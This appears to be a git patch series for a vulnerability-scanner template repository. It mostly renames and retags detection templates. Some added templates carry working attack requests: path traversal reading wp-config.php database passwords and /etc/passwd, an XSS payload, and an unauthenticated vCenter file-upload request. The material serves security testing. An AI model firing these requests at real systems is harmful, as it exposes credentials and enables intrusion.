b/exposed-panels/tomcat-pathnormalization.yaml similarity index 100% rename from exposed-panels/tomcat-manager-pathnormalization.yaml rename to exposed-panels/tomcat-pathnormalization.yaml diff --git a/exposed-panels/weave-scope-dashboard-detect.yaml b/exposed-panels/weave-scope-dashboard.yaml similarity index 91% rename from exposed-panels/weave-scope-dashboard-detect.yaml rename to exposed-panels/weave-scope-dashboard.yaml index 8bed7aece0..dad19221c9 100644 --- a/exposed-panels/weave-scope-dashboard-detect.yaml +++ b/exposed-panels/weave-scope-dashboard.yaml @@ -1,4 +1,4 @@ -id: weave-scope-dashboard-detect +id: weave-scope-dashboard info: name: Weave Scope Dashboard diff --git a/exposed-panels/workspaceone-uem-airwatch-dashboard-detect.yaml b/exposed-panels/workspaceone-uem-dashboard.yaml similarity index 88% rename from exposed-panels/workspaceone-uem-airwatch-dashboard-detect.yaml rename to exposed-panels/workspaceone-uem-dashboard.yaml index 119554ec8c..355e7e6b7c 100644 --- a/exposed-panels/workspaceone-uem-airwatch-dashboard-detect.yaml +++ b/exposed-panels/workspaceone-uem-dashboard.yaml @@ -1,4 +1,4 @@ -id: workspaceone-uem-airwatch-dashboard-detect +id: workspaceone-uem-dashboard info: name: Workspace ONE Unified Endpoint Management (UEM) AirWatch diff --git a/exposed-panels/zoho-manageengine-adaudit.yaml b/exposed-panels/zoho/manageengine-adaudit.yaml similarity index 64% rename from exposed-panels/zoho-manageengine-adaudit.yaml rename to exposed-panels/zoho/manageengine-adaudit.yaml index 4559d0164a..e2de7755dd 100644 --- a/exposed-panels/zoho-manageengine-adaudit.yaml +++ b/exposed-panels/zoho/manageengine-adaudit.yaml @@ -1,16 +1,17 @@ -id: zoho-manageengine-adaudit +id: manageengine-adaudit info: - name: ZOHO-ManageEngine-ADAudit - author: dhiyaneshDK + name: ZOHO ManageEngine ADAudit/ADManager Panel + author: dhiyaneshDK,PR3R00T severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+-+ADManager+Plus%22 - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET path: - '{{BaseURL}}' + - "{{BaseURL}}/authorization.do" matchers-condition: and matchers: diff --git a/exposed-panels/zoho-manageengine-adselfservice-plus.yaml b/exposed-panels/zoho/manageengine-adselfservice.yaml similarity index 78% rename from exposed-panels/zoho-manageengine-adselfservice-plus.yaml rename to exposed-panels/zoho/manageengine-adselfservice.yaml index 551357ff34..7362411b83 100644 --- a/exposed-panels/zoho-manageengine-adselfservice-plus.yaml +++ b/exposed-panels/zoho/manageengine-adselfservice.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-adselfservice-plus +id: manageengine-adselfservice info: - name: ZOHO-ManageEngine-ADSelfService Plus + name: ZOHO ManageEngine ADSelfService Plus author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposed-panels/zoho-manageengine-analyticsplus.yaml b/exposed-panels/zoho/manageengine-analytics.yaml similarity index 76% rename from exposed-panels/zoho-manageengine-analyticsplus.yaml rename to exposed-panels/zoho/manageengine-analytics.yaml index 85ffbcb133..0bcf30f91c 100644 --- a/exposed-panels/zoho-manageengine-analyticsplus.yaml +++ b/exposed-panels/zoho/manageengine-analytics.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-analyticsplus +id: manageengine-analytics info: - name: ZOHO-ManageEngine-Analytics Plus + name: ZOHO ManageEngine Analytics Plus author: dhiyaneshDK severity: info reference: https://fofa.so/result?qbase64=YXBwPSJaT0hPLea1gemHj%2BeuoeeQhiI%3D - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposed-panels/zoho-manageengine-apex-helpdesk.yaml b/exposed-panels/zoho/manageengine-apex-helpdesk.yaml similarity index 75% rename from exposed-panels/zoho-manageengine-apex-helpdesk.yaml rename to exposed-panels/zoho/manageengine-apex-helpdesk.yaml index 2339f18d3d..e31dbab0d5 100644 --- a/exposed-panels/zoho-manageengine-apex-helpdesk.yaml +++ b/exposed-panels/zoho/manageengine-apex-helpdesk.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-apex-helpdesk +id: manageengine-apex-helpdesk info: - name: ZOHO-ManageEngine-APEX-IT-Help-Desk + name: ZOHO ManageEngine APEX IT Help-Desk author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22APEX+IT+Help+Desk%22 - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposed-panels/zoho-manageengine-applications-manager.yaml b/exposed-panels/zoho/manageengine-applications-manager.yaml similarity index 78% rename from exposed-panels/zoho-manageengine-applications-manager.yaml rename to exposed-panels/zoho/manageengine-applications-manager.yaml index 36dd80f6be..b03b1362aa 100644 --- a/exposed-panels/zoho-manageengine-applications-manager.yaml +++ b/exposed-panels/zoho/manageengine-applications-manager.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-applications-manager +id: manageengine-applications-manager info: - name: ZOHO-ManageEngine-Applications-Manager + name: ZOHO ManageEngine Applications Manager author: dhiyaneshDK severity: info reference: https://fofa.so/result?qbase64=YXBwPSJaT0hPLU1hbmFnZUVuZ2luZS1BcHBsaWNhdGlvbnMtTWFuYWdlciI%3D - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposed-panels/zoho-manageengine-assetexplorer.yaml b/exposed-panels/zoho/manageengine-assetexplorer.yaml similarity index 75% rename from exposed-panels/zoho-manageengine-assetexplorer.yaml rename to exposed-panels/zoho/manageengine-assetexplorer.yaml index 96458c1258..c9bf60d719 100644 --- a/exposed-panels/zoho-manageengine-assetexplorer.yaml +++ b/exposed-panels/zoho/manageengine-assetexplorer.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-assetexplorer +id: manageengine-assetexplorer info: - name: ZOHO-ManageEngine-AssetExplorer + name: ZOHO ManageEngine AssetExplorer author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22 - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposed-panels/zoho-manageengine-desktop.yaml b/exposed-panels/zoho/manageengine-desktop.yaml similarity index 78% rename from exposed-panels/zoho-manageengine-desktop.yaml rename to exposed-panels/zoho/manageengine-desktop.yaml index 1d1e412802..310ef954d9 100644 --- a/exposed-panels/zoho-manageengine-desktop.yaml +++ b/exposed-panels/zoho/manageengine-desktop.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-desktop +id: manageengine-desktop info: - name: ZOHO-ManageEngine-Desktop + name: ZOHO ManageEngine Desktop author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+Desktop+Central+10%22 - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposed-panels/zoho-manageengine-opmanager.yaml b/exposed-panels/zoho/manageengine-opmanager.yaml similarity index 78% rename from exposed-panels/zoho-manageengine-opmanager.yaml rename to exposed-panels/zoho/manageengine-opmanager.yaml index e8bf39dd8a..21380ff972 100644 --- a/exposed-panels/zoho-manageengine-opmanager.yaml +++ b/exposed-panels/zoho/manageengine-opmanager.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-opmanager +id: manageengine-opmanager info: - name: ZOHO-ManageEngine-OpManager + name: ZOHO ManageEngine OpManager author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22OpManager+Plus%22 - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposed-panels/zoho-manageengine-servicedesk.yaml b/exposed-panels/zoho/manageengine-servicedesk.yaml similarity index 79% rename from exposed-panels/zoho-manageengine-servicedesk.yaml rename to exposed-panels/zoho/manageengine-servicedesk.yaml index 36b2aa1903..eaf03fbc08 100644 --- a/exposed-panels/zoho-manageengine-servicedesk.yaml +++ b/exposed-panels/zoho/manageengine-servicedesk.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-servicedesk +id: manageengine-servicedesk info: - name: ZOHO-ManageEngine-ServiceDesk + name: ZOHO ManageEngine ServiceDesk author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22 - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposed-panels/zoho-manageengine-supportcenter.yaml b/exposed-panels/zoho/manageengine-supportcenter.yaml similarity index 76% rename from exposed-panels/zoho-manageengine-supportcenter.yaml rename to exposed-panels/zoho/manageengine-supportcenter.yaml index 1e04db2ff8..2eb61d45cd 100644 --- a/exposed-panels/zoho-manageengine-supportcenter.yaml +++ b/exposed-panels/zoho/manageengine-supportcenter.yaml @@ -1,11 +1,11 @@ -id: zoho-manageengine-supportcenter +id: manageengine-supportcenter info: - name: ZOHO-ManageEngine-SupportCenter + name: ZOHO ManageEngine SupportCenter author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+SupportCenter+Plus%22 - tags: panel,zoho + tags: panel,zoho,manageengine requests: - method: GET diff --git a/exposures/configs/amazon-docker-config-disclosure.yaml b/exposures/configs/amazon-docker-config.yaml similarity index 90% rename from exposures/configs/amazon-docker-config-disclosure.yaml rename to exposures/configs/amazon-docker-config.yaml index 7e0c16546d..4eaa175dfc 100644 --- a/exposures/configs/amazon-docker-config-disclosure.yaml +++ b/exposures/configs/amazon-docker-config.yaml @@ -1,4 +1,4 @@ -id: amazon-docker-config-disclosure +id: amazon-docker-config info: name: Dockerrun AWS Configuration Exposure diff --git a/exposures/configs/kyan-network-credentials-disclosure.yaml b/exposures/configs/kyan-credential-exposure.yaml similarity index 93% rename from exposures/configs/kyan-network-credentials-disclosure.yaml rename to exposures/configs/kyan-credential-exposure.yaml index 07618dcff2..ce77127596 100644 --- a/exposures/configs/kyan-network-credentials-disclosure.yaml +++ b/exposures/configs/kyan-credential-exposure.yaml @@ -1,4 +1,4 @@ -id: kyan-network-credential-exposure +id: kyan-credential-exposure info: name: Kyan network monitoring device account and password exposure diff --git a/exposures/configs/oracle-ebs-credentials-disclosure.yaml b/exposures/configs/oracle-ebs-credentials.yaml similarity index 95% rename from exposures/configs/oracle-ebs-credentials-disclosure.yaml rename to exposures/configs/oracle-ebs-credentials.yaml index e633180ddd..140dc71722 100644 --- a/exposures/configs/oracle-ebs-credentials-disclosure.yaml +++ b/exposures/configs/oracle-ebs-credentials.yaml @@ -1,4 +1,4 @@ -id: oracle-ebs-credentials-disclosure +id: oracle-ebs-credentials info: name: Oracle EBS Credentials Disclosure diff --git a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml b/exposures/configs/ruijie-nbr1300g-exposure.yaml similarity index 95% rename from exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml rename to exposures/configs/ruijie-nbr1300g-exposure.yaml index e07c091886..b4ae923be3 100644 --- a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml +++ b/exposures/configs/ruijie-nbr1300g-exposure.yaml @@ -1,4 +1,4 @@ -id: ruijie-nbr1300g-cli-password-leak +id: ruijie-nbr1300g-exposure info: name: Ruijie NBR1300G Cli Password Leak diff --git a/exposures/files/ruby-on-rails-secret-token-disclosure.yaml b/exposures/files/rails-secret-token-disclosure.yaml similarity index 93% rename from exposures/files/ruby-on-rails-secret-token-disclosure.yaml rename to exposures/files/rails-secret-token-disclosure.yaml index 1e68f41bd6..047262e88b 100644 --- a/exposures/files/ruby-on-rails-secret-token-disclosure.yaml +++ b/exposures/files/rails-secret-token-disclosure.yaml @@ -1,4 +1,4 @@ -id: ruby-on-rails-secret-token-disclosure +id: rails-secret-token-disclosure info: name: Ruby on Rails Secret Token Disclosure diff --git a/exposures/files/sensitive-storage-data-exposure.yaml b/exposures/files/sensitive-storage-exposure.yaml similarity index 100% rename from exposures/files/sensitive-storage-data-exposure.yaml rename to exposures/files/sensitive-storage-exposure.yaml diff --git a/fuzzing/xff-403-bypass.yaml b/fuzzing/xff-403-bypass.yaml index ea2bdc4bf0..61a9f441c8 100644 --- a/fuzzing/xff-403-bypass.yaml +++ b/fuzzing/xff-403-bypass.yaml @@ -5,7 +5,7 @@ info: author: vavkamil severity: info description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. - tags: xff,bypass,fuzz + tags: fuzz requests: - raw: diff --git a/iot/unauthorized-brother-access-detect.yaml b/iot/brother-unauthorized-access.yaml similarity index 83% rename from iot/unauthorized-brother-access-detect.yaml rename to iot/brother-unauthorized-access.yaml index 17abe4ddfc..3e9b12151b 100644 --- a/iot/unauthorized-brother-access-detect.yaml +++ b/iot/brother-unauthorized-access.yaml @@ -1,11 +1,11 @@ -id: brother-unauthorized-access-detect +id: brother-unauthorized-access info: name: Brother Printer author: pussycat0x severity: medium reference: https://www.exploit-db.com/ghdb/6889 - tags: iot,printer + tags: iot,printer,unauth requests: - method: GET diff --git a/iot/panasonic-network-management.yaml b/iot/panasonic-network-management.yaml index c917e12098..78bdd0b49c 100644 --- a/iot/panasonic-network-management.yaml +++ b/iot/panasonic-network-management.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: medium reference: https://www.exploit-db.com/ghdb/6487 - tags: iot + tags: iot,camera,panasonic requests: - method: GET diff --git a/misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml b/misconfiguration/etcd-unauthenticated-api.yaml similarity index 100% rename from misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml rename to misconfiguration/etcd-unauthenticated-api.yaml diff --git a/misconfiguration/gitlab/gitlab-user-enumeration.yaml b/misconfiguration/gitlab/gitlab-user-enumeration.yaml index 9a7fb41992..c390d4e905 100644 --- a/misconfiguration/gitlab/gitlab-user-enumeration.yaml +++ b/misconfiguration/gitlab/gitlab-user-enumeration.yaml @@ -4,8 +4,7 @@ info: name: Gitlab User enumeration author: pikpikcu severity: info - tags: gitlab,enum - + tags: gitlab,enumeration requests: - method: POST diff --git a/misconfiguration/zenphoto-installation-sensitive-info.yaml b/misconfiguration/zenphoto-sensitive-info.yaml similarity index 100% rename from misconfiguration/zenphoto-installation-sensitive-info.yaml rename to misconfiguration/zenphoto-sensitive-info.yaml diff --git a/vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml b/vulnerabilities/ibm/ibm-infoprint-lfi.yaml similarity index 100% rename from vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml rename to vulnerabilities/ibm/ibm-infoprint-lfi.yaml From c9eaf79f28c9ec728723dfd56035c17def88161d Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 22 Sep 2021 07:34:09 +0900 Subject: [PATCH 2466/4083] Create product-input-fields-for-woocommerce-file-download.yaml --- ...-fields-for-woocommerce-file-download.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 product-input-fields-for-woocommerce-file-download.yaml diff --git a/product-input-fields-for-woocommerce-file-download.yaml b/product-input-fields-for-woocommerce-file-download.yaml new file mode 100644 index 0000000000..5c4de213ce --- /dev/null +++ b/product-input-fields-for-woocommerce-file-download.yaml @@ -0,0 +1,29 @@ +id: product-input-fields-for-woocommerce-file-download + +info: + name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download + author: 0x_Akoko + severity: high + tags: wordpress,woocommerce,lfi + description: The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. + reference: + - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74 + - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/ + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 9486e13d9928928a6818891c9c33c480905d227a Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 22 Sep 2021 07:36:57 +0900 Subject: [PATCH 2467/4083] Create cs-cart-unauthenticated-lfi.yaml --- cs-cart-unauthenticated-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cs-cart-unauthenticated-lfi.yaml diff --git a/cs-cart-unauthenticated-lfi.yaml b/cs-cart-unauthenticated-lfi.yaml new file mode 100644 index 0000000000..1abb6807b8 --- /dev/null +++ b/cs-cart-unauthenticated-lfi.yaml @@ -0,0 +1,24 @@ +id: cs-cart-unauthenticated-lfi + +info: + name: CS-Cart unauthenticated LFI + author: 0x_Akoko + severity: high + reference: https://cxsecurity.com/issue/WLB-2020100100 + tags: cscart,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 0e70b02815e89080ff278b58174617fdc1fb7c55 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 22 Sep 2021 14:45:54 +0700 Subject: [PATCH 2468/4083] Create CVE-2015-6920.yaml --- cves/2015/CVE-2015-6920.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2015/CVE-2015-6920.yaml diff --git a/cves/2015/CVE-2015-6920.yaml b/cves/2015/CVE-2015-6920.yaml new file mode 100644 index 0000000000..9cc2ed0b4b --- /dev/null +++ b/cves/2015/CVE-2015-6920.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-6920 + +info: + name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://packetstormsecurity.com/files/133371/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 + tags: cve,cve2015,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 1bed5c9351b94751b00aac10881f89b8d67bfd33 Mon Sep 17 00:00:00 2001 From: PR3R00T <50199640+PR3R00T@users.noreply.github.com> Date: Wed, 22 Sep 2021 09:05:36 +0100 Subject: [PATCH 2469/4083] New VMWare Vcenter File upload check. https://kb.vmware.com/s/article/85717 - taking the attached python script as validation. --- cves/2021/CVE-2021-22005.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-22005.yaml diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml new file mode 100644 index 0000000000..03ecd5202a --- /dev/null +++ b/cves/2021/CVE-2021-22005.yaml @@ -0,0 +1,23 @@ +id: cve-2021-22005 +info: + name: Vcenter Unauthenticated Remote Upload + author: PR3R00T + severity: Critical +requests: + - raw: + - | + POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + test_data + + matchers-condition: and + matchers: + - type: word + words: + - "Server: Apache" + part: header + - type: status + status: + - 201 From f1b6b4dc9bfb7d0bc0116b0479e382392d017e74 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 15:33:51 +0530 Subject: [PATCH 2470/4083] improved matchers --- cves/2021/CVE-2021-22005.yaml | 34 +++++++++++++++++++++++----------- 1 file changed, 23 insertions(+), 11 deletions(-) diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml index 03ecd5202a..6a7b22b6f6 100644 --- a/cves/2021/CVE-2021-22005.yaml +++ b/cves/2021/CVE-2021-22005.yaml @@ -1,10 +1,22 @@ -id: cve-2021-22005 +id: CVE-2021-22005 + info: - name: Vcenter Unauthenticated Remote Upload + name: VMware vCenter Server file upload vulnerability author: PR3R00T - severity: Critical + severity: critical + description: The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. + reference: + - https://kb.vmware.com/s/article/85717 + - https://www.vmware.com/security/advisories/VMSA-2021-0020.html + - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq + tags: cve,cve2021,vmware,vcenter + requests: - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + - | POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 Host: {{Hostname}} @@ -12,12 +24,12 @@ requests: test_data - matchers-condition: and + req-condition: true matchers: - - type: word - words: - - "Server: Apache" - part: header - - type: status - status: - - 201 + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 201" + - "contains(body_1, 'VMware vSphere')" + - "content_length_2 == 0" + condition: and \ No newline at end of file From 77215862c96c96e04673e10d73c2470cc200399a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 Sep 2021 10:21:33 +0000 Subject: [PATCH 2471/4083] Auto Generated CVE annotations [Wed Sep 22 10:21:33 UTC 2021] :robot: --- cves/2018/CVE-2018-16836.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml index 472089aa4c..0a8102bf1d 100644 --- a/cves/2018/CVE-2018-16836.yaml +++ b/cves/2018/CVE-2018-16836.yaml @@ -3,9 +3,15 @@ id: CVE-2018-16836 info: name: Rubedo CMS 3.4.0 - Directory Traversal author: 0x_Akoko - severity: high + severity: critical reference: https://www.exploit-db.com/exploits/45385 tags: cve,cve2018,rubedo,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16836 + cwe-id: CWE-22 + description: "Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI." requests: - method: GET From a58515594a9dd380b78bcad8dc20b5ae3d7676a8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 16:07:07 +0530 Subject: [PATCH 2472/4083] misc update --- default-logins/UCMDB/ucmdb-default-login.yaml | 2 +- default-logins/abb/cs141-default-login.yaml | 2 +- default-logins/activemq/activemq-default-login.yaml | 2 +- default-logins/aem/aem-default-login.yaml | 2 +- default-logins/alibaba/canal-default-login.yaml | 2 +- default-logins/ambari/ambari-default-login.yaml | 4 ++-- default-logins/apache/airflow-default-login.yaml | 4 ++-- default-logins/apache/superset-default-login.yaml | 4 ++-- default-logins/apache/tomcat-default-login.yaml | 2 +- default-logins/arl/arl-default-login.yaml | 2 +- default-logins/chinaunicom/chinaunicom-default-login.yaml | 2 +- default-logins/dell/emcecom-default-login.yaml | 6 +++--- default-logins/druid/druid-default-login.yaml | 2 +- default-logins/dvwa/dvwa-default-login.yaml | 2 +- default-logins/exacqvision/exacqvision-default-login.yaml | 2 +- default-logins/flir/flir-default-login.yaml | 2 +- default-logins/frps/frp-default-login.yaml | 4 ++-- default-logins/glpi/glpi-default-login.yaml | 2 +- default-logins/grafana/grafana-default-login.yaml | 2 +- default-logins/guacamole/guacamole-default-login.yaml | 4 ++-- default-logins/hongdian/hongdian-default-login.yaml | 2 +- default-logins/hortonworks/smartsense-default-login.yaml | 4 ++-- default-logins/ibm/ibm-storage-default-credential.yaml | 2 +- default-logins/idemia/idemia-biometrics-default-login.yaml | 4 ++-- default-logins/iptime/iptime-default-login.yaml | 2 +- default-logins/minio/minio-default-login.yaml | 2 +- default-logins/nagios/nagios-default-login.yaml | 2 +- default-logins/nexus/nexus-default-login.yaml | 2 +- default-logins/nps/nps-default-login.yaml | 2 +- default-logins/ofbiz/ofbiz-default-login.yaml | 4 ++-- .../oracle/businessintelligence-default-login.yaml | 2 +- default-logins/paloalto/panos-default-login.yaml | 4 ++-- default-logins/panabit/panabit-default-login.yaml | 2 +- default-logins/rabbitmq/rabbitmq-default-login.yaml | 2 +- default-logins/rockmongo/rockmongo-default-login.yaml | 2 +- default-logins/samsung/samsung-wlan-default-login.yaml | 2 +- default-logins/showdoc/showdoc-default-login.yaml | 2 +- default-logins/solarwinds/solarwinds-default-login.yaml | 2 +- default-logins/spectracom/spectracom-default-login.yaml | 2 +- default-logins/szhe/szhe-default-login.yaml | 2 +- default-logins/vidyo/vidyo-default-login.yaml | 4 ++-- default-logins/viewpoint/trilithic-viewpoint-login.yaml | 2 +- default-logins/visionhub/visionhub-default-login.yaml | 6 +++--- default-logins/wifisky/wifisky-default-login.yaml | 2 +- default-logins/wso2/wso2-default-login.yaml | 2 +- default-logins/xxljob/xxljob-default-login.yaml | 2 +- default-logins/zabbix/zabbix-default-login.yaml | 4 ++-- default-logins/zmanda/zmanda-default-login.yaml | 4 ++-- 48 files changed, 64 insertions(+), 64 deletions(-) diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml index 853c72e16b..77cd96a74f 100644 --- a/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/default-logins/UCMDB/ucmdb-default-login.yaml @@ -1,7 +1,7 @@ id: ucmdb-default-login info: - name: Micro Focus UCMDB Default Credentials + name: Micro Focus UCMDB Default Login author: dwisiswant0 severity: high tags: ucmdb,default-login diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 60bdbd942f..eca65b4527 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -1,7 +1,7 @@ id: cs141-default-login info: - name: CS141 SNMP Module Default Credentials + name: CS141 SNMP Module Default Login author: socketz severity: medium reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml index c235703f24..d867be0088 100644 --- a/default-logins/activemq/activemq-default-login.yaml +++ b/default-logins/activemq/activemq-default-login.yaml @@ -1,7 +1,7 @@ id: activemq-default-login info: - name: Apache ActiveMQ Default Credentials + name: Apache ActiveMQ Default Login author: pdteam severity: medium tags: apache,activemq,default-login diff --git a/default-logins/aem/aem-default-login.yaml b/default-logins/aem/aem-default-login.yaml index 71d356860b..6ac263a2bd 100644 --- a/default-logins/aem/aem-default-login.yaml +++ b/default-logins/aem/aem-default-login.yaml @@ -1,7 +1,7 @@ id: aem-default-login info: - name: Adobe AEM Default Credentials + name: Adobe AEM Default Login author: random-robbie severity: critical tags: aem,default-login,fuzz diff --git a/default-logins/alibaba/canal-default-login.yaml b/default-logins/alibaba/canal-default-login.yaml index 3ed00c8cc5..2b2c640fba 100644 --- a/default-logins/alibaba/canal-default-login.yaml +++ b/default-logins/alibaba/canal-default-login.yaml @@ -1,7 +1,7 @@ id: canal-default-login info: - name: Alibaba Canal Default Credentials + name: Alibaba Canal Default Login author: pdteam severity: high tags: alibaba,default-login diff --git a/default-logins/ambari/ambari-default-login.yaml b/default-logins/ambari/ambari-default-login.yaml index cd31405298..0013f7acd5 100644 --- a/default-logins/ambari/ambari-default-login.yaml +++ b/default-logins/ambari/ambari-default-login.yaml @@ -1,7 +1,7 @@ -id: ambari-default-credentials +id: ambari-default-login info: - name: Apache Ambari Default Credentials + name: Apache Ambari Default Login author: pdteam severity: medium tags: ambari,default-login diff --git a/default-logins/apache/airflow-default-login.yaml b/default-logins/apache/airflow-default-login.yaml index c53dac75ff..c01227d4b7 100644 --- a/default-logins/apache/airflow-default-login.yaml +++ b/default-logins/apache/airflow-default-login.yaml @@ -1,7 +1,7 @@ -id: airflow-default-credentials +id: airflow-default-login info: - name: Apache Airflow Default Credentials + name: Apache Airflow Default Login author: pdteam severity: critical tags: airflow,default-login diff --git a/default-logins/apache/superset-default-login.yaml b/default-logins/apache/superset-default-login.yaml index e5ff9cb506..26ec0e941e 100644 --- a/default-logins/apache/superset-default-login.yaml +++ b/default-logins/apache/superset-default-login.yaml @@ -1,7 +1,7 @@ -id: apache-superset-default-credentials +id: apache-superset-default-login info: - name: Apache Superset Default Credentials + name: Apache Superset Default Login author: dhiyaneshDK severity: high reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml index 685ca0ca0e..49a6417b07 100644 --- a/default-logins/apache/tomcat-default-login.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -1,6 +1,6 @@ id: tomcat-default-login info: - name: Tomcat Manager Default Credentials + name: Tomcat Manager Default Login author: pdteam severity: high tags: tomcat,apache,default-login diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml index c7877e85f7..5523da410d 100644 --- a/default-logins/arl/arl-default-login.yaml +++ b/default-logins/arl/arl-default-login.yaml @@ -1,7 +1,7 @@ id: arl-default-login info: - name: ARL Default Credentials + name: ARL Default Login author: pikpikcu severity: high tags: arl,default-login diff --git a/default-logins/chinaunicom/chinaunicom-default-login.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml index f6e43806a9..0fe2cf1a2e 100644 --- a/default-logins/chinaunicom/chinaunicom-default-login.yaml +++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml @@ -1,7 +1,7 @@ id: chinaunicom-default-login info: - 